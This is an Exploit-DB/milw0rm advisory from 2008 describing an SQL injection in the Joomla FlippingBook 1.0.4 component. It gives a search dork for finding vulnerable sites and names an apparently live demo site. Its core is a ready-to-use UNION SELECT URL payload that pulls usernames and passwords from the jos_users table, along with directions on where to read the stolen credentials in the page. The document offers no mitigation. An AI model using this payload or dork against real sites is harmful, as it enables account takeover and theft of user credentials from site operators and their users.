Joomla! Component FlippingBook 1.0.4 - SQL Injection

EDB-ID:

5484

Author:

cO2

Type:

webapps

Platform:

PHP

Published:

2008-04-22

     [  A L G E R I A     S E C U R I T Y    C R E W  ]
##########################################
#
# [ Joomla Component FlippingBook 1.0.4 SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.Dz-Secure.com
[~] Greetings: to all hackers DZ . . .
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'FlippingBook'
[~]  Version() :  1.0.4
###########################################
#
# DORK 1 :  inurl:com_flippingbook
#
###########################################
[+]Demo : http://www.page-flip-tools.com/index.php?option=com_flippingbook

[+]Exploit :
 
/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
[+] : Open the source page to see the 'password'
###########################################

# milw0rm.com [2008-04-22]